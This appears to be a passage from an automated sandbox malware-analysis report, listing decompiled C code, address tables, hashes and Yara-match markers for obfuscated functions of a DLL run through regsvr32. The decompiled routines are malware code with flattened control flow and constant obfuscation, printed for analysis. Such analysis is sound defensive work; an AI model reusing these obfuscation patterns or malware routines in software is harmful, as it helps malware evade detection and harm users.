0x10011c55
0x10011c57
0x10011c59
0x10011c5b
0x10011c5e
0x00000000
0x00000000
0x1001199a
0x1001199a
0x100119a1
0x100119a6
0x100119a6
0x00000000
0x00000000
0x1001193d
0x1001198b
0x1001198e
0x1001198e
0x1001198e
0x10011995
0x00000000
0x10011995
0x100118bd
0x100118bf
0x100118c2
0x00000000
0x00000000
0x100118c4
0x100118ca
0x100118cd
0x100118d2
0x100118d4
0x00000000
0x00000000
0x100118da
0x100118e1
0x00000000
0x00000000
0x00000000
0x100118e3
0x1001183b
0x1001183f
0x00000000
0x00000000
0x10011841
0x10011847
0x10011851
0x10011851
0x10011857
0x10011861
0x10011867
0x1001186a
0x00000000
0x00000000
0x1001186c
0x1001187a
0x10011880
0x10011882
0x00000000
0x00000000
0x00000000
0x10011882
0x10011859
0x1001185f
0x00000000
0x00000000
0x00000000
0x1001185f
0x10011849
0x1001184f
0x00000000
0x00000000
0x00000000
0x10011820
0x1001182b
0x10011830
0x10011832
0x100117c8
0x100117c8
0x10011c81
0x10011c81
0x10011c86
0x10011c8b
0x10011c8b
0x10011c8d
0x10011c94
0x10011c9b
0x100119a8
0x100119ad
0x100119ad
0x00000000
0x10011832
0x1001181e
0x100117d9
0x100117dc
0x100117de
0x00000000
0x00000000
0x100117e9
0x100117ea
0x100117eb
0x100117f0
0x00000000
0x100117f0
0x100117b2
0x100117b7
0x100117c2
0x00000000
0x00000000
0x00000000

APIs

__EH_prolog3.LIBCMT ref: 10011791

Memory Dump Source

Source File: 00000002.00000002.651345596.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.651342620.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.651363188.0000000010029000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.651368974.0000000010032000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.651386401.0000000010056000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.651389703.000000001005A000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.651393113.000000001005D000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd

Similarity

API ID: H_prolog3
String ID:
API String ID: 431132790-0
Opcode ID: c488e6358afd4d9d754c5c9fda2634e7bab5cc465686e7f95f68ab9b090a2a17
Instruction ID: cc0fde642219aadce896e713a6cb9948d2e0911a96acc08396d26a1a5d665eaf
Opcode Fuzzy Hash: c488e6358afd4d9d754c5c9fda2634e7bab5cc465686e7f95f68ab9b090a2a17
Instruction Fuzzy Hash: 6EF15F74604219EFDB18DF64C890AFE7BE9EF04350F108519F919AF292DB34E981EB61

Uniqueness

Uniqueness Score: -1.00%

Function 100012D0, Relevance: 1.5, APIs: 1, Instructions: 40
COMMON

Download Yara Rule

C-Code - Quality: 58%

			E100012D0(intOrPtr __ecx, void* _a4) {
				char _v8;
				signed int _v12;
				char _v20;
				void _v1044;
				intOrPtr _v1048;
				void* __edi;
				void* __esi;
				signed int _t19;
				intOrPtr _t26;
				signed int _t41;

				_t19 =  *0x10057a08; // 0x7d1a16f8
				_v12 = _t19 ^ _t41;
				_v1048 = __ecx;
				_v20 = 0;
				_v8 = 0x10;
				__imp__#17( &_v1044, 0x400, 0, _v1048 + 0x14,  &_v8);
				_v20 = _v1048;
				 *((char*)(_t41 + _v20 - 0x410)) = 0;
				memcpy(_a4,  &_v1044, 0x101 << 2);
				return E100167D5(_a4, _t26, _v12 ^ _t41, _v20,  &_v1044 + 0x202,  &_v1044,  *((intOrPtr*)(_v1048 + 0x24)));
			}

0x100012d9
0x100012e0
0x100012e5
0x100012eb
0x100012f2
0x1000131f
0x10001325
0x1000132b
0x10001341
0x10001355

APIs

recvfrom.WS2_32(?,?,00000400,00000000,?,00000010), ref: 1000131F

Memory Dump Source

Source File: 00000002.00000002.651345596.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.651342620.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.651363188.0000000010029000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.651368974.0000000010032000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.651386401.0000000010056000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.651389703.000000001005A000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.651393113.000000001005D000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd

Similarity

API ID: recvfrom
String ID:
API String ID: 846543921-0
Opcode ID: e3286800183b2fb084681865d01d3168ae5294563589533788e7953d9f8637e2
Instruction ID: bec5cb5057db5f544406cf49396100538fbf28fc5aa5dd8def6f1e45c3881569
Opcode Fuzzy Hash: e3286800183b2fb084681865d01d3168ae5294563589533788e7953d9f8637e2
Instruction Fuzzy Hash: 830112F5A0011C9FDB14CF58CD54BDEB7B8FF88314F4045A9E609A7241D7B4AA84CBA5

Uniqueness

Uniqueness Score: -1.00%

Function 04B4F840, Relevance: 1.5, Strings: 1, Instructions: 210
COMMONCrypto

Download Yara Rule

C-Code - Quality: 94%

			E04B4F840(void* __ecx, void* __edx, intOrPtr* _a4, intOrPtr _a8) {
				char _v4;
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				void* _t197;
				void* _t220;
				intOrPtr* _t230;
				void* _t232;
				void* _t252;
				void* _t253;
				signed int _t254;
				signed int _t255;
				signed int _t256;
				signed int _t257;
				signed int _t258;
				signed int _t259;
				signed int _t260;
				signed int _t261;
				signed int* _t264;

				_t230 = _a4;
				_push(_a8);
				_t252 = __ecx;
				_push(_t230);
				_push(__ecx);
				E04B4FE29(_t197);
				_v16 = 0x43fd88;
				_t264 =  &(( &_v84)[4]);
				_v16 = _v16 << 4;
				_v16 = _v16 ^ 0x043fd881;
				_t253 = 0;
				_v36 = 0xa6c090;
				_t232 = 0x483ab52;
				_v36 = _v36 >> 0xd;
				_v36 = _v36 + 0x55d4;
				_v36 = _v36 ^ 0x00005b0b;
				_v48 = 0x2dc4d8;
				_t254 = 0xf;
				_v48 = _v48 / _t254;
				_v48 = _v48 + 0x1bd9;
				_v48 = _v48 ^ 0x0001e475;
				_v80 = 0x1961e0;
				_v80 = _v80 | 0x2e5a3b97;
				_v80 = _v80 >> 0x10;
				_v80 = _v80 >> 4;
				_v80 = _v80 ^ 0x00050c56;
				_v52 = 0x801119;
				_t255 = 0x4c;
				_v52 = _v52 * 0x3b;
				_v52 = _v52 / _t255;
				_v52 = _v52 ^ 0x006b0701;
				_v12 = 0x5b3baf;
				_v12 = _v12 + 0xffffe0d8;
				_v12 = _v12 ^ 0x0050d6d6;
				_v20 = 0xddf3bb;
				_v20 = _v20 + 0x1688;
				_v20 = _v20 ^ 0x00da105f;
				_v84 = 0xb842b2;
				_v84 = _v84 >> 3;
				_t256 = 0x6e;
				_v84 = _v84 * 0x79;
				_v84 = _v84 << 3;
				_v84 = _v84 ^ 0x571ab13d;
				_v56 = 0xc043e1;
				_v56 = _v56 >> 6;
				_v56 = _v56 ^ 0x181f9cd5;
				_v56 = _v56 ^ 0x181bbe52;
				_v24 = 0xd2b7cf;
				_v24 = _v24 / _t256;
				_v24 = _v24 ^ 0x00057f60;
				_v60 = 0x8a3800;
				_v60 = _v60 >> 6;
				_v60 = _v60 | 0x8f8b2365;
				_v60 = _v60 ^ 0x8f8e0970;
				_v64 = 0xc9e96d;
				_v64 = _v64 << 0x10;
				_v64 = _v64 << 5;
				_v64 = _v64 ^ 0x2da69c1f;
				_v68 = 0x328e52;
				_v68 = _v68 * 0x66;
				_v68 = _v68 << 3;
				_v68 = _v68 ^ 0xa1266097;
				_v28 = 0xf9277c;
				_v28 = _v28 << 0xa;
				_v28 = _v28 << 3;
				_v28 = _v28 ^ 0x24e98be4;
				_v72 = 0xc9ae08;
				_v72 = _v72 | 0xbe9fb7a8;
				_v72 = _v72 << 1;
				_v72 = _v72 + 0xffff17b5;
				_v72 = _v72 ^ 0x7db3cb0d;
				_v32 = 0x7a6981;
				_v32 = _v32 ^ 0xd4fdb142;
				_t257 = 0x69;
				_v32 = _v32 / _t257;
				_v32 = _v32 ^ 0x020955a0;
				_v76 = 0x732b21;
				_t258 = 0x5e;
				_v76 = _v76 / _t258;
				_t259 = 0xb;
				_v76 = _v76 / _t259;
				_v76 = _v76 + 0xb8c3;
				_v76 = _v76 ^ 0x0005bc70;
				_v8 = 0x8f6a69;
				_t260 = 0x5d;
				_v8 = _v8 / _t260;
				_v8 = _v8 ^ 0x000b5b39;
				_v40 = 0x75e3f0;
				_t261 = 0x55;
				_v40 = _v40 / _t261;
				_v40 = _v40 + 0xffff98ec;
				_v40 = _v40 ^ 0x0009f0a2;
				_v44 = 0x50946;
				_v44 = _v44 * 0x76;
				_v44 = _v44 + 0xffff2591;
				_v44 = _v44 ^ 0x0253dc14;
				do {
					while(_t232 != 0x483ab52) {
						if(_t232 == 0x71a4461) {
							_t220 = E04B4A1C0(_v48, _t232, _v80, _v52, _v12,  &_v4, _v16, _v20, _v84, 0, _t232, _v56, _t252);
							_t264 =  &(_t264[0xc]);
							if(_t220 != 0) {
								_t232 = 0xc565723;
								continue;
							}
						} else {
							if(_t232 == 0xc565723) {
								_push(_t232);
								_push(_t232);
								_t253 = E04B3C5D8(_v4);
								_t264 =  &(_t264[3]);
								if(_t253 != 0) {
									_t232 = 0xf0f9d9d;
									continue;
								}
							} else {
								if(_t232 != 0xf0f9d9d) {
									goto L12;
								} else {
									E04B4A1C0(_v28, _t232, _v72, _v32, _v76,  &_v4, _v36, _v8, _v40, _t253, _t232, _v44, _t252);
									 *_t230 = _v4;
								}
							}
						}
						L6:
						return _t253;
					}
					_t232 = 0x71a4461;
					L12:
				} while (_t232 != 0xd0fff7e);
				goto L6;
			}

0x04b4f844
0x04b4f84b
0x04b4f84f
0x04b4f851
0x04b4f853
0x04b4f854
0x04b4f859
0x04b4f861
0x04b4f864
0x04b4f86b
0x04b4f873
0x04b4f875
0x04b4f87d
0x04b4f882
0x04b4f887
0x04b4f88f
0x04b4f897
0x04b4f8a5
0x04b4f8aa
0x04b4f8b0
0x04b4f8b8
0x04b4f8c0
0x04b4f8c8
0x04b4f8d0
0x04b4f8d5
0x04b4f8da
0x04b4f8e2
0x04b4f8ef
0x04b4f8f2
0x04b4f8fe
0x04b4f902
0x04b4f90a
0x04b4f912
0x04b4f91a
0x04b4f922
0x04b4f92a
0x04b4f932
0x04b4f93a
0x04b4f942
0x04b4f94c
0x04b4f94d
0x04b4f951
0x04b4f956
0x04b4f95e
0x04b4f966
0x04b4f96b
0x04b4f973
0x04b4f97b
0x04b4f989
0x04b4f98d
0x04b4f995
0x04b4f99d
0x04b4f9a2
0x04b4f9aa
0x04b4f9b2
0x04b4f9ba
0x04b4f9bf
0x04b4f9c4
0x04b4f9cc
0x04b4f9d9
0x04b4f9dd
0x04b4f9e2
0x04b4f9ec
0x04b4f9f4
0x04b4f9f9
0x04b4f9fe
0x04b4fa06
0x04b4fa0e
0x04b4fa16
0x04b4fa1a
0x04b4fa22
0x04b4fa2a
0x04b4fa32
0x04b4fa40
0x04b4fa45
0x04b4fa4b
0x04b4fa53
0x04b4fa5f
0x04b4fa64
0x04b4fa6e
0x04b4fa73
0x04b4fa79
0x04b4fa81
0x04b4fa89
0x04b4fa95
0x04b4fa9a
0x04b4faa0
0x04b4faa8
0x04b4fab4
0x04b4fabc
0x04b4fac0
0x04b4fac8
0x04b4fad0
0x04b4fadd
0x04b4fae1
0x04b4fae9
0x04b4faf1
0x04b4faf1
0x04b4faff
0x04b4fbb5
0x04b4fbba
0x04b4fbbf
0x04b4fbc1
0x00000000
0x04b4fbc1
0x04b4fb05
0x04b4fb0b
0x04b4fb6d
0x04b4fb6e
0x04b4fb78
0x04b4fb7a
0x04b4fb7f
0x04b4fb81
0x00000000
0x04b4fb81
0x04b4fb0d
0x04b4fb13
0x00000000
0x04b4fb19
0x04b4fb42
0x04b4fb51
0x04b4fb51
0x04b4fb13
0x04b4fb0b
0x04b4fb54
0x04b4fb5c
0x04b4fb5c
0x04b4fbcb
0x04b4fbcd
0x04b4fbcd
0x00000000

Strings

!+s, xrefs: 04B4FA53

Memory Dump Source

Source File: 00000002.00000002.651296715.0000000004B31000.00000020.00000001.sdmp, Offset: 04B30000, based on PE: true

Associated: 00000002.00000002.651288624.0000000004B30000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.651316907.0000000004B56000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4b30000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: !+s
API String ID: 0-2041718826
Opcode ID: ecbfb722ef4a51468ccc6504c580edf44e6ea5507055d07fe96aabdae32b1462
Instruction ID: 422b5ee040e56f42ac62813ae222713040f14a1beaa886320c519b5957e76a21
Opcode Fuzzy Hash: ecbfb722ef4a51468ccc6504c580edf44e6ea5507055d07fe96aabdae32b1462
Instruction Fuzzy Hash: FD912E720083409FD758CF66C88991BFBE1FBC5B58F40892DF69686260D3B6D949CF82

Uniqueness

Uniqueness Score: -1.00%

Function 04B4C5D5, Relevance: 1.4, Strings: 1, Instructions: 194
COMMONCrypto

Download Yara Rule

C-Code - Quality: 77%

			E04B4C5D5() {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				short _t190;
				signed int _t195;
				void* _t198;
				void* _t217;
				intOrPtr _t220;
				void* _t221;
				short* _t222;
				void* _t223;
				short* _t224;
				signed int _t225;
				signed int _t226;
				signed int _t227;
				signed int _t228;
				signed int _t229;
				signed int _t230;
				signed int _t231;
				void* _t232;

				_t220 =  *0x4b56214; // 0x0
				_v28 = 0x163a95;
				_t221 = _t220 + 0x23c;
				_t198 = 0x1db3eac;
				_t225 = 0x2a;
				_v28 = _v28 * 0x43;
				_v28 = _v28 | 0x78fa3d4f;
				_v28 = _v28 + 0xb7b9;
				_v28 = _v28 ^ 0x7df609b0;
				_v36 = 0x641eba;
				_v36 = _v36 / _t225;
				_v36 = _v36 << 8;
				_v36 = _v36 ^ 0x02679a20;
				_v60 = 0x1f128d;
				_v60 = _v60 | 0x723f4715;
				_v60 = _v60 ^ 0x7234fc66;
				_v8 = 0xac331e;
				_v8 = _v8 ^ 0xe591128e;
				_v8 = _v8 << 4;
				_v8 = _v8 + 0xffffc28e;
				_v8 = _v8 ^ 0x53d02dfe;
				_v32 = 0x5bb4ea;
				_v32 = _v32 ^ 0xe8579be7;
				_v32 = _v32 + 0xffff04e9;
				_v32 = _v32 ^ 0xe8074079;
				_v40 = 0xd0bea7;
				_v40 = _v40 << 1;
				_t226 = 0x1d;
				_v40 = _v40 / _t226;
				_v40 = _v40 ^ 0x000c7110;
				_v64 = 0x41c151;
				_v64 = _v64 << 1;
				_v64 = _v64 ^ 0x00828c11;
				_v44 = 0x3034cc;
				_t227 = 0x1a;
				_v44 = _v44 / _t227;
				_v44 = _v44 + 0xffffde13;
				_v44 = _v44 ^ 0x000cb2d3;
				_v12 = 0xb1859b;
				_v12 = _v12 ^ 0xe04d3b3c;
				_t228 = 0x25;
				_v12 = _v12 * 7;
				_v12 = _v12 | 0x0065acf4;
				_v12 = _v12 ^ 0x26e71960;
				_v68 = 0x4e3808;
				_v68 = _v68 | 0x4ec02654;
				_v68 = _v68 ^ 0x4ec4b15d;
				_v48 = 0x7afa7b;
				_v48 = _v48 ^ 0xc20923f7;
				_v48 = _v48 / _t228;
				_v48 = _v48 ^ 0x0544c062;
				_v20 = 0x2ff9aa;
				_v20 = _v20 + 0xffffa865;
				_v20 = _v20 * 0x24;
				_v20 = _v20 + 0x4632;
				_v20 = _v20 ^ 0x06bd6615;
				_v16 = 0x2d8807;
				_v16 = _v16 * 0x5f;
				_v16 = _v16 << 3;
				_v16 = _v16 << 6;
				_v16 = _v16 ^ 0xcaf714e8;
				_v52 = 0xcb8ac1;
				_v52 = _v52 << 0xb;
				_v52 = _v52 >> 0xc;
				_v52 = _v52 ^ 0x000dc079;
				_v24 = 0xed824f;
				_v24 = _v24 + 0x6e9c;
				_t229 = 0x19;
				_v24 = _v24 / _t229;
				_v24 = _v24 >> 0x10;
				_v24 = _v24 ^ 0x00044037;
				_v56 = 0xd4fc47;
				_v56 = _v56 << 5;
				_v56 = _v56 << 0xb;
				_v56 = _v56 ^ 0xfc4a9c10;
				_v72 = 0x35720e;
				_v72 = _v72 ^ 0x5bf10d31;
				_v72 = _v72 ^ 0x5bc050cb;
				do {
					while(_t198 != 0x1db3eac) {
						if(_t198 == 0x2b86adf) {
							E04B3E404(_v56, 1, _v72, 3, _t221);
							 *((short*)(_t221 + 6)) = 0;
							return 0;
						}
						if(_t198 == 0x6ec99df) {
							_push(_t198);
							_push(_t198);
							_t230 = E04B4CCA0(4, 0x10);
							E04B3E404(_v52, 1, _v24, _t230, _t221);
							_t232 = _t232 + 0x1c;
							_t222 = _t221 + _t230 * 2;
							_t198 = 0x2b86adf;
							_t190 = 0x2e;
							 *_t222 = _t190;
							_t221 = _t222 + 2;
							continue;
						}
						if(_t198 != 0x6f740c2) {
							goto L8;
						}
						_push(_t198);
						_push(_t198);
						_t195 = E04B4CCA0(4, 0x10);
						_push(_t221);
						_push(1);
						_push(_v64);
						_t231 = _t195;
						_t217 = 2;
						E04B3E404(_v40, _t217);
						_t223 = _t221 + 2;
						E04B3E404(_v44, 1, _v12, _t231, _t223);
						_t232 = _t232 + 0x28;
						_t224 = _t223 + _t231 * 2;
						_t198 = 0x6ec99df;
						_t190 = 0x5c;
						 *_t224 = _t190;
						_t221 = _t224 + 2;
					}
					E04B3DC1B(_t198);
					_t198 = 0x6f740c2;
					L8:
				} while (_t198 != 0x41dad81);
				return _t190;
			}

0x04b4c5dd
0x04b4c5e5
0x04b4c5ec
0x04b4c5f6
0x04b4c5fd
0x04b4c600
0x04b4c603
0x04b4c60a
0x04b4c611
0x04b4c618
0x04b4c626
0x04b4c629
0x04b4c62d
0x04b4c634
0x04b4c63b
0x04b4c642
0x04b4c649
0x04b4c650
0x04b4c657
0x04b4c65b
0x04b4c662
0x04b4c669
0x04b4c670
0x04b4c677
0x04b4c67e
0x04b4c685
0x04b4c68c
0x04b4c692
0x04b4c697
0x04b4c69c
0x04b4c6a3
0x04b4c6aa
0x04b4c6ad
0x04b4c6b4
0x04b4c6be
0x04b4c6c3
0x04b4c6c8
0x04b4c6cf
0x04b4c6d6
0x04b4c6dd
0x04b4c6e8
0x04b4c6e9
0x04b4c6ec
0x04b4c6f3
0x04b4c6fa
0x04b4c701
0x04b4c708
0x04b4c70f
0x04b4c716
0x04b4c722
0x04b4c725
0x04b4c72c
0x04b4c733
0x04b4c73e
0x04b4c741
0x04b4c748
0x04b4c74f
0x04b4c75a
0x04b4c75d
0x04b4c761
0x04b4c767
0x04b4c76e
0x04b4c775
0x04b4c779
0x04b4c77d
0x04b4c784
0x04b4c78b
0x04b4c797
0x04b4c79a
0x04b4c79d
0x04b4c7a1
0x04b4c7a8
0x04b4c7af
0x04b4c7b3
0x04b4c7b7
0x04b4c7be
0x04b4c7c5
0x04b4c7cc
0x04b4c7d3
0x04b4c7d3
0x04b4c7e5
0x04b4c8bb
0x04b4c8c5
0x00000000
0x04b4c8c5
0x04b4c7f1
0x04b4c85e
0x04b4c85f
0x04b4c869
0x04b4c876
0x04b4c87b
0x04b4c87e
0x04b4c881
0x04b4c888
0x04b4c889
0x04b4c88c
0x00000000
0x04b4c88c
0x04b4c7f9
0x00000000
0x00000000
0x04b4c80b
0x04b4c80c
0x04b4c811
0x04b4c816
0x04b4c817
0x04b4c819
0x04b4c81f
0x04b4c823
0x04b4c824
0x04b4c829
0x04b4c837
0x04b4c83c
0x04b4c83f
0x04b4c842
0x04b4c849
0x04b4c84a
0x04b4c84d
0x04b4c84d
0x04b4c897
0x04b4c89c
0x04b4c8a1
0x04b4c8a1
0x00000000

Strings

<;M, xrefs: 04B4C6DD

Memory Dump Source

Source File: 00000002.00000002.651296715.0000000004B31000.00000020.00000001.sdmp, Offset: 04B30000, based on PE: true

Associated: 00000002.00000002.651288624.0000000004B30000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.651316907.0000000004B56000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4b30000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: <;M
API String ID: 0-164005337
Opcode ID: 1cc033f5d85d982a31c1109458ded56dc148b78a8c1be7c1722cac64186654c3
Instruction ID: 7eb875d693efce0a8ddd4329d332fce48f2cdc5033a334faca970d00c63e2912
Opcode Fuzzy Hash: 1cc033f5d85d982a31c1109458ded56dc148b78a8c1be7c1722cac64186654c3
Instruction Fuzzy Hash: 2D918A71D01218EBDB18CFA9D98A9EEFBB1FF84314F20804AE512BB250D7B41A45CF94

Uniqueness

Uniqueness Score: -1.00%

Function 04B31F38, Relevance: 1.4, Strings: 1, Instructions: 134
COMMONCrypto

Download Yara Rule

C-Code - Quality: 90%

			E04B31F38(intOrPtr __ecx, void* __edx, intOrPtr _a4) {
				char _v556;
				intOrPtr _v564;
				char _v584;
				signed int _v588;
				signed int _v592;
				signed int _v596;
				signed int _v600;
				signed int _v604;
				signed int _v608;
				signed int _v612;
				signed int _v616;
				signed int _v620;
				signed int _v624;
				void* _t89;
				signed int _t97;
				intOrPtr _t102;
				signed int _t104;
				char* _t105;
				void* _t119;
				signed int* _t125;

				_push(E04B3E5C0);
				_push(_a4);
				_t102 = __ecx;
				_push(__edx);
				_push(__ecx);
				E04B4FE29(_t89);
				_v588 = 0xa9001c;
				_t125 =  &(( &_v624)[4]);
				_v588 = _v588 + 0xfffff841;
				_v588 = _v588 ^ 0x00a8f85f;
				_t119 = 0x7750dec;
				_v596 = 0x801276;
				_v596 = _v596 << 8;
				_v596 = _v596 ^ 0x801c5a8c;
				_v592 = 0xe5da65;
				_v592 = _v592 | 0x8d0ca196;
				_v592 = _v592 ^ 0x8de55992;
				_v612 = 0x74ea46;
				_v612 = _v612 >> 6;
				_v612 = _v612 | 0x4c0dce94;
				_v612 = _v612 ^ 0x4c0245c2;
				_v604 = 0x7f8ae0;
				_t104 = 0x6f;
				_v604 = _v604 / _t104;
				_v604 = _v604 + 0x431c;
				_v604 = _v604 ^ 0x0002d2ab;
				_v608 = 0x66ed0;
				_v608 = _v608 >> 5;
				_v608 = _v608 * 0x5a;
				_v608 = _v608 ^ 0x001395e3;
				_v620 = 0x99715e;
				_v620 = _v620 + 0xffff5a71;
				_v620 = _v620 << 0x10;
				_v620 = _v620 + 0xbf19;
				_v620 = _v620 ^ 0xcbc1aabc;
				_v624 = 0x2a4f9d;
				_v624 = _v624 | 0x7ed7085f;
				_v624 = _v624 + 0xffff4297;
				_v624 = _v624 | 0x5a00af06;
				_v624 = _v624 ^ 0x7efc78c9;
				_v600 = 0xb3c9ce;
				_v600 = _v600 + 0xffff4f2d;
				_v600 = _v600 ^ 0x00b0dce6;
				_t118 = _v600;
				_v616 = 0x17dc9d;
				_v616 = _v616 ^ 0xb350768a;
				_v616 = _v616 + 0xffff5841;
				_v616 = _v616 ^ 0xb3483330;
				do {
					while(_t119 != 0x26f316f) {
						if(_t119 == 0x4832572) {
							_v556 = 0x22c;
							_t105 =  &_v556;
							_t97 = E04B3BD23(_t105, _t118, _v612, _v604, _v608);
							_t125 =  &(_t125[3]);
							L12:
							asm("sbb esi, esi");
							_t119 = ( ~_t97 & 0xf2b580e0) + 0xfb9b08f;
							continue;
						}
						if(_t119 == 0x7750dec) {
							_v564 = _t102;
							_t119 = 0xecc24d5;
							continue;
						}
						if(_t119 == 0x88070fd) {
							_t97 = E04B506EC(_v620, _t118, _v624,  &_v556);
							_pop(_t105);
							goto L12;
						}
						if(_t119 != 0xecc24d5) {
							if(_t119 == 0xfb9b08f) {
								return E04B51538(_v600, _v616, _t118);
							}
							goto L18;
						}
						_push(_t105);
						_t97 = E04B37603(_v588);
						_t118 = _t97;
						_t105 = _t105;
						__eflags = _t97 - 0xffffffff;
						if(__eflags != 0) {
							_t119 = 0x4832572;
							continue;
						}
						L8:
						return _t97;
					}
					__eflags = E04B3E5C0(__eflags,  &_v556,  &_v584);
					if(__eflags == 0) {
						_t119 = 0xfb9b08f;
						goto L18;
					} else {
						_t119 = 0x88070fd;
						continue;
					}
					goto L8;
					L18:
					__eflags = _t119 - 0x5c72449;
				} while (__eflags != 0);
				return _t97;
			}

0x04b31f42
0x04b31f47
0x04b31f4e
0x04b31f50
0x04b31f51
0x04b31f52
0x04b31f57
0x04b31f5f
0x04b31f62
0x04b31f6c
0x04b31f74
0x04b31f79
0x04b31f86
0x04b31f8b
0x04b31f93
0x04b31f9b
0x04b31fa3
0x04b31fab
0x04b31fb3
0x04b31fb8
0x04b31fc0
0x04b31fc8
0x04b31fd6
0x04b31fd9
0x04b31fdd
0x04b31fe5
0x04b31fed
0x04b31ff5
0x04b31fff
0x04b32003
0x04b3200b
0x04b32013
0x04b3201b
0x04b32020
0x04b32028
0x04b32030
0x04b32038
0x04b32040
0x04b32048
0x04b32050
0x04b32058
0x04b32060
0x04b32068
0x04b32070
0x04b32074
0x04b3207c
0x04b32084
0x04b3208c
0x04b32094
0x04b32094
0x04b320a6
0x04b32146
0x04b32152
0x04b3215a
0x04b3215f
0x04b3211f
0x04b32123
0x04b3212b
0x00000000
0x04b3212b
0x04b320b2
0x04b32132
0x04b32136
0x00000000
0x04b32136
0x04b320ba
0x04b32118
0x04b3211e
0x00000000
0x04b3211e
0x04b320c2
0x04b320c6
0x00000000
0x04b320da
0x00000000
0x04b320c6
0x04b320ee
0x04b320f4
0x04b320f9
0x04b320fc
0x04b320fd
0x04b32100
0x04b32102
0x00000000
0x04b32102
0x04b320e5
0x04b320e5
0x04b320e5
0x04b32173
0x04b32175
0x04b32181
0x00000000
0x04b32177
0x04b32177
0x00000000
0x04b32177
0x00000000
0x04b32183
0x04b32183
0x04b32183
0x00000000

Strings

Ft, xrefs: 04B31FAB

Memory Dump Source

Source File: 00000002.00000002.651296715.0000000004B31000.00000020.00000001.sdmp, Offset: 04B30000, based on PE: true

Associated: 00000002.00000002.651288624.0000000004B30000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.651316907.0000000004B56000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4b30000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: Ft
API String ID: 0-1468847975
Opcode ID: c3b5313a3ed097f668899be1c8c0e5d4174a4d2714c5c4af0a0147b491ca424d
Instruction ID: 26206898d7fba7a03fc298480df62327e21c3086a8461769c0593c06fef8b241
Opcode Fuzzy Hash: c3b5313a3ed097f668899be1c8c0e5d4174a4d2714c5c4af0a0147b491ca424d
Instruction Fuzzy Hash: 23518C7290C3018BC358DF65D88541BBBE0FBC8728F044A9DF999A2160D7B1EA59CB87

Uniqueness

Uniqueness Score: -1.00%

Function 04B4E1F8, Relevance: 1.4, Strings: 1, Instructions: 112
COMMONCrypto

Download Yara Rule

C-Code - Quality: 90%

			E04B4E1F8(signed int* __ecx, void* __edx, void* __eflags) {
				void* _t64;
				signed int _t73;
				short* _t92;
				signed int _t93;
				signed int _t99;
				unsigned int _t100;
				unsigned int _t101;
				signed int _t110;
				short* _t111;
				signed int* _t112;
				signed int* _t113;
				signed int _t114;
				signed int _t115;
				signed int _t116;
				unsigned int _t118;
				void* _t124;
				short _t126;
				void* _t128;
				void* _t130;

				_push( *(_t128 + 0x30));
				_push( *(_t128 + 0x30));
				_push( *(_t128 + 0x30));
				_push(__ecx);
				E04B4FE29(_t64);
				 *(_t128 + 0x28) = 0xaa6cff;
				_t112 =  &(__ecx[1]);
				 *(_t128 + 0x28) =  *(_t128 + 0x28) + 0x5a3e;
				 *(_t128 + 0x28) =  *(_t128 + 0x28) << 0xc;
				 *(_t128 + 0x28) =  *(_t128 + 0x28) ^ 0xac7afad8;
				 *(_t128 + 0x24) = 0xf23620;
				_t114 = 0x4f;
				 *(_t128 + 0x28) =  *(_t128 + 0x24) / _t114;
				_t115 = 0x1d;
				 *(_t128 + 0x28) =  *(_t128 + 0x28) / _t115;
				 *(_t128 + 0x28) =  *(_t128 + 0x28) ^ 0x0000f47a;
				 *(_t128 + 0x24) = 0x6765f0;
				 *(_t128 + 0x24) =  *(_t128 + 0x24) | 0x7b5bc89c;
				 *(_t128 + 0x24) =  *(_t128 + 0x24) >> 1;
				 *(_t128 + 0x24) =  *(_t128 + 0x24) ^ 0x3db51d28;
				 *(_t128 + 0x30) = 0xe89ec2;
				_t116 = 0x26;
				 *(_t128 + 0x2c) =  *(_t128 + 0x30) / _t116;
				 *(_t128 + 0x2c) =  *(_t128 + 0x2c) ^ 0x00078a4c;
				_t110 =  *__ecx;
				_t113 =  &(_t112[1]);
				_t73 =  *_t112 ^ _t110;
				 *(_t128 + 0x30) = _t110;
				 *(_t128 + 0x34) = _t73;
				_t118 =  !=  ? (_t73 + 0x00000001 & 0xfffffffc) + 4 : _t73 + 1;
				_t92 = E04B3C5D8(_t118 + _t118);
				_t130 = _t128 + 0x18;
				 *((intOrPtr*)(_t130 + 0x18)) = _t92;
